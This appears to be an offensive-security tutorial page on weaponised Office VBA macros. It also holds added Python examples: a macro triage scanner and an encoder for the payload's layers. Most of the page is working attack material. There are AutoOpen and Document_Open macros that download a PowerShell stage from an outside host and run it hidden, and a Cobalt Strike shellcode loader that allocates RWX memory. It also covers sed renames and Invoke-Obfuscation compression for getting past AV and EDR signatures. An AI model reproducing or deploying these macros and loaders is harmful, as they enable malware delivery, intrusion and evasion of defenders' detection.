Hassan Saad

Visual Basic (VBA Macros)


Last updated 2 years ago

Simple Scenario

Both macros below do the same thing: when the document is opened, start a hidden PowerShell that downloads a stage from the attacker's web server and runs it with IEX. Use one or the other; two Subs named AutoOpen cannot coexist in the same module.

Variant 1: WScript.Shell. powershell.exe is spawned directly by the Office process (WINWORD.EXE / EXCEL.EXE), which is exactly the parent/child relationship most EDR rules alert on.

Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub

Variant 2: WMI. Win32_Process.Create is serviced by the WMI provider host, so powershell.exe shows up as a child of WmiPrvSE.exe instead of the Office process, which breaks the simple Office-spawns-PowerShell parent/child signature (the command line itself is still visible).

Sub AutoOpen()
  Dim proc As Object
  Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
  proc.Create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub
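As an added example (not code from the original page or from the author's tooling), here is a small Python triage script of the kind a defender's macro scanner would run over the two variants above: it looks for the auto-execution entry points, the process-spawn primitive, and the usual PowerShell cradle markers, and records which parent process each spawn primitive produces. The two macros are embedded as constructed sample strings; the function names (triage_macro, expected_parent) and the scoring weights are my own.

```python
import re

# Constructed samples: the two AutoOpen variants from the page, as raw strings.
MACRO_WSCRIPT = r'''Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub'''

MACRO_WMI = r'''Sub AutoOpen()
  Dim proc As Object
  Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
  proc.Create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.120/a'))"""
End Sub'''

# Auto-execution entry points Office honours (Word: AutoOpen/Document_Open, Excel: Auto_Open/Workbook_Open).
AUTOEXEC = re.compile(
    r"\bSub\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\s*\(", re.I)

# Process-spawn primitives, and the parent process a hunter should expect for the child.
SPAWN_TECHNIQUES = [
    (re.compile(r'CreateObject\(\s*"wscript\.shell"\s*\)', re.I),
     "WScript.Shell.Run", "the Office process (WINWORD.EXE / EXCEL.EXE)"),
    (re.compile(r'GetObject\(\s*"winmgmts:[^"]*Win32_Process"\s*\)', re.I),
     "WMI Win32_Process.Create", "WmiPrvSE.exe (breaks the Office parent/child chain)"),
    (re.compile(r"(?<![\w.])Shell\s*\(", re.I),
     "VBA Shell()", "the Office process (WINWORD.EXE / EXCEL.EXE)"),
]

# Command-line markers typical of a PowerShell download cradle.
PAYLOAD_HINTS = [
    (re.compile(r"powershell(\.exe)?\b", re.I), "powershell"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "no profile"),
    (re.compile(r"downloadstring|downloadfile|XMLHTTP|ADODB\.Stream", re.I), "download cradle"),
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "in-memory execution (IEX)"),
]


def triage_macro(src):
    """Return a triage report for one VBA module's source text."""
    report = {
        "autoexec": [m.group(1) for m in AUTOEXEC.finditer(src)],
        "spawn": [(label, parent) for rx, label, parent in SPAWN_TECHNIQUES if rx.search(src)],
        "hints": [label for rx, label in PAYLOAD_HINTS if rx.search(src)],
    }
    # Auto-exec trigger plus a way to start a process is the macro-dropper shape;
    # the cradle markers only raise confidence. Weights are arbitrary (my own).
    report["score"] = 2 * len(report["autoexec"]) + 3 * len(report["spawn"]) + len(report["hints"])
    report["suspicious"] = bool(report["autoexec"]) and bool(report["spawn"])
    return report


def expected_parent(src):
    """Parent process a detection rule should key on for the PowerShell this macro spawns."""
    return [parent for _, parent in triage_macro(src)["spawn"]]


if __name__ == "__main__":
    for name, macro in (("wscript", MACRO_WSCRIPT), ("wmi", MACRO_WMI)):
        r = triage_macro(macro)
        print(name, "score=%d suspicious=%s" % (r["score"], r["suspicious"]), r["spawn"])
```

The point of recording the parent process is that a rule written as "WINWORD.EXE spawns powershell.exe" catches variant 1 but not variant 2; for the WMI variant the process tree is WmiPrvSE.exe -> powershell.exe, and the detection has to pivot on the command line or on Office loading the WMI scripting objects instead.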

Advanced Scenario

Attack Diagram

Listener & Payload

  • Generate a 32-bit (x86) PowerShell payload from Cobalt Strike and save it as payload.ps1.

  • Rename the payload generator's default function and variable names with the sed script below. Those names (func_get_proc_address, $var_code, $DoIt and so on) are well-known signature material for AV and EDR, so renaming them is the cheapest first step; the trailing substitutions rewrite literal zeros as 0x0 for the same reason.

# Functions
sed -i "s/func_get_proc_address/tryfun0/g" payload.ps1
sed -i "s/func_get_delegate_type/tryfun1/g" payload.ps1


# Variables
sed -i "s/\$var_module/\$tryvar0/g" payload.ps1
sed -i "s/\$var_procedure/\$tryvar1/g" payload.ps1
sed -i "s/\$var_unsafe_native_methods/\$tryvar2/g" payload.ps1
sed -i "s/\$var_gpa/\$tryvar3/g" payload.ps1
sed -i "s/\$var_parameters/\$tryvar4/g" payload.ps1
sed -i "s/\$var_type_builder/\$tryvar5/g" payload.ps1
sed -i "s/\$var_return_type/\$tryvar6/g" payload.ps1
sed -i "s/\$var_code/\$tryvar7/g" payload.ps1
sed -i "s/\$x/\$tryvar8/g" payload.ps1
sed -i "s/\$var_va/\$tryvar9/g" payload.ps1
sed -i "s/\$var_buffer/\$tryvar10/g" payload.ps1
sed -i "s/\$var_runme/\$tryvar11/g" payload.ps1

# Other
sed -i "s/\$DoIt/\$tryvar12/g" payload.ps1
sed -i "s/\$a/\$tryvar13/g" payload.ps1
sed -i "s/, 0,/, 0x0,/g" payload.ps1
sed -i "s/= 0;/= 0x0;/g" payload.ps1
  • Obfuscate the inner Base64 string (the generator's $var_code value, $tryvar7 after the renames) with Invoke-Obfuscation's COMPRESS option. In the menu below, "Payload" stands for that Base64 string; the decompression expression Invoke-Obfuscation prints is what appears as $new_me in the script that follows:

git clone https://github.com/danielbohannon/Invoke-Obfuscation
pwsh
> Import-Module ./Invoke-Obfuscation/Invoke-Obfuscation.psd1
> Invoke-Obfuscation
> set ScriptBlock "Payload"
> compress
> 1
> copy
  • The full PowerShell code, after the renames and with the compressed blob in place of the original Base64 string:

Set-StrictMode -Version 2

# The loader is kept as a string ($tryvar12) and only executed at the end, so that a 64-bit
# PowerShell host can re-run it inside a 32-bit job (the stager is x86; see the bottom).
$tryvar12 = @'
# tryfun0 (was func_get_proc_address): GetProcAddress through reflection on
# Microsoft.Win32.UnsafeNativeMethods in System.dll, so no Add-Type / P/Invoke is needed.
function tryfun0 {
	Param ($tryvar0, $tryvar1)		
	$tryvar2 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$tryvar3 = $tryvar2.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $tryvar3.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($tryvar2.GetMethod('GetModuleHandle')).Invoke($null, @($tryvar0)))), $tryvar1))
}

# tryfun1 (was func_get_delegate_type): emit a delegate type at runtime with the given
# parameter and return types, so a raw function pointer can be invoked as a method.
function tryfun1 {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tryvar4,
		[Parameter(Position = 1)] [Type] $tryvar6 = [Void]
	)

	$tryvar5 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tryvar5.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $tryvar4).SetImplementationFlags('Runtime, Managed')
	$tryvar5.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tryvar6, $tryvar4).SetImplementationFlags('Runtime, Managed')

	return $tryvar5.CreateType()
}

# Invoke-Obfuscation COMPRESS output: Base64-decode, inflate the raw Deflate stream, read it as ASCII.
# The resulting text is the original Base64 string of the XOR-encoded shellcode.
$new_me = (NEw-OBject  io.COMprEssIoN.DEfLAteStREAm([iO.MeMORYStReaM][cONVERT]::frombaSe64sTRiNG('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') , [SYStEM.Io.COmpRESsioN.CompresSIOnmodE]::DECOmPrEsS) | % {NEw-OBject  syStEm.io.StReAMREaDer( $_,[TExT.eNcoDIng]::ASCiI )}| %{ $_.reaDToenD( ) } )

[Byte[]]$tryvar7 = [System.Convert]::FromBase64String($new_me)

# Undo the single-byte XOR (key 35 = 0x23) that the generator applied to the shellcode.
for ($tryvar8 = 0x0; $tryvar8 -lt $tryvar7.Count; $tryvar8++) {
	$tryvar7[$tryvar8] = $tryvar7[$tryvar8] -bxor 35
}

# VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40),
# then copy the decoded shellcode into that RWX buffer.
$tryvar9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((tryfun0 kernel32.dll VirtualAlloc), (tryfun1 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$tryvar10 = $tryvar9.Invoke([IntPtr]::Zero, $tryvar7.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($tryvar7, 0x0, $tryvar10, $tryvar7.length)

# Wrap the buffer as a void(IntPtr) delegate and call it: the stager runs inside powershell.exe.
$tryvar11 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tryvar10, (tryfun1 @([IntPtr]) ([Void])))
$tryvar11.Invoke([IntPtr]::Zero)
'@

# x86 stager: on a 64-bit PowerShell host, run the loader in a -RunAs32 background job.
If ([IntPtr]::size -eq 8) {
	start-job { param($tryvar13) IEX $tryvar13 } -RunAs32 -Argument $tryvar12 | wait-job | Receive-Job
}
else {
	IEX $tryvar12
}
  • Optionally Base64-encode the script to keep the plain text off the wire:

cat payload.ps1.new | base64 -w 0

Note that the macro below downloads payload.ps1.new and hands it straight to powershell.exe as a .ps1 file, so what you host at that URL must be the script itself. If you host the Base64 string instead, the macro has to decode it before execution, or pass it with -EncodedCommand, which expects Base64 of a UTF-16LE string rather than the UTF-8 that base64 -w 0 produces here.

  • Host the file on your own web server. The macro expects port 8000, which is the default for both commands below (Python 2 and Python 3 respectively):

python -m SimpleHTTPServer
python3 -m http.server 8000
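The procedure above only shows the decoding side, in the PowerShell loader; as an added example (my own code, not the page's or Cobalt Strike's), here is the matching generation side in Python, so the layering is explicit: XOR the shellcode with 35, Base64 it, raw-Deflate that text, Base64 again, and that is the string inside FromBase64String in the $new_me line. decode_stage mirrors the loader step by step, and loader_expression prints the $new_me line in readable casing. The shellcode is a constructed byte pattern, not a real stager; the function names are mine.

```python
import base64
import zlib

XOR_KEY = 35  # the loader's "-bxor 35"


def raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE (RFC 1951) with no zlib header, which is what .NET DeflateStream reads."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def raw_inflate(data: bytes) -> bytes:
    return zlib.decompress(data, -15)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encode_stage(shellcode: bytes, key: int = XOR_KEY) -> str:
    """Produce the blob that goes inside FromBase64String('...') in the loader.

    Layers, outermost first:  Base64( Deflate( ASCII-Base64( XOR(shellcode, key) ) ) )
    The inner Base64 text is what the loader reads back with StreamReader and then
    passes to FromBase64String before its XOR loop.
    """
    inner_b64 = base64.b64encode(xor_bytes(shellcode, key))  # ASCII bytes
    return base64.b64encode(raw_deflate(inner_b64)).decode("ascii")


def decode_stage(blob: str, key: int = XOR_KEY) -> bytes:
    """Mirror the loader: Base64 -> inflate -> ASCII text -> Base64 -> XOR."""
    inner_b64 = raw_inflate(base64.b64decode(blob)).decode("ascii")
    return xor_bytes(base64.b64decode(inner_b64), key)


def loader_expression(blob: str) -> str:
    """The $new_me line of the loader with the random casing removed (same objects, same calls)."""
    return (
        "(New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('%s'), "
        "[IO.Compression.CompressionMode]::Decompress) "
        "| ForEach-Object { New-Object IO.StreamReader($_, [Text.Encoding]::ASCII) } "
        "| ForEach-Object { $_.ReadToEnd() })" % blob
    )


# Constructed stand-in for a 32-bit stager: a deterministic byte pattern, not real shellcode.
SAMPLE_SHELLCODE = bytes((i * 37 + 11) & 0xFF for i in range(300))

if __name__ == "__main__":
    blob = encode_stage(SAMPLE_SHELLCODE)
    assert decode_stage(blob) == SAMPLE_SHELLCODE
    print(len(SAMPLE_SHELLCODE), "shellcode bytes ->", len(blob), "blob chars")
    print("$new_me = " + loader_expression(blob)[:120] + "...")
```

Keep in mind what this does and does not buy: the XOR and the compression only hide the bytes from a static scan of the script text. The decoded shellcode exists in plaintext in the process before VirtualAlloc, and the script itself is handed to AMSI when IEX $tryvar12 runs, so the renames and the blob encoding are complementary to, not a substitute for, the AMSI-related evasion covered elsewhere on this site.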

Macro Code (VB)

' Auto_Open fires in Excel (and in Word when the macro sits in a standard module);
' Document_Open is Word's ThisDocument event. Both just call the downloader.
Sub Auto_Open()
  DownloadFileFromURL
End Sub

Sub Document_Open()
  DownloadFileFromURL
End Sub

Sub DownloadFileFromURL()

  Dim FileUrl As String
  Dim objXmlHttpReq As Object
  Dim objStream As Object

  FileUrl = "http://192.168.80.128:8000/payload.ps1.new"

  ' Synchronous GET through MSXML; the user/password arguments only matter if the server challenges.
  Set objXmlHttpReq = CreateObject("Microsoft.XMLHTTP")
  objXmlHttpReq.Open "GET", FileUrl, False, "username", "password"
  objXmlHttpReq.send

  If objXmlHttpReq.Status = 200 Then
    Set objStream = CreateObject("ADODB.Stream")

    ' ActiveWorkbook is an Excel object; in Word use ActiveDocument.Path instead.
    ' ChDir does not switch drives, so call ChDrive first if the document lives on another drive.
    ChDir ActiveWorkbook.Path

    ' Write the response body as a binary stream (Type = 1) next to the document.
    objStream.Open
    objStream.Type = 1
    objStream.Write objXmlHttpReq.responseBody
    objStream.SaveToFile CurDir() & "\bla4.ps1", 2   ' 2 = adSaveCreateOverWrite
    objStream.Close

    ' SysWOW64 is the 32-bit PowerShell on 64-bit Windows, matching the 32-bit stager;
    ' this path does not exist on a 32-bit OS. Only run the script once the download succeeded.
    Shell ("c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -W Hidden .\bla4.ps1")

  End If

End Sub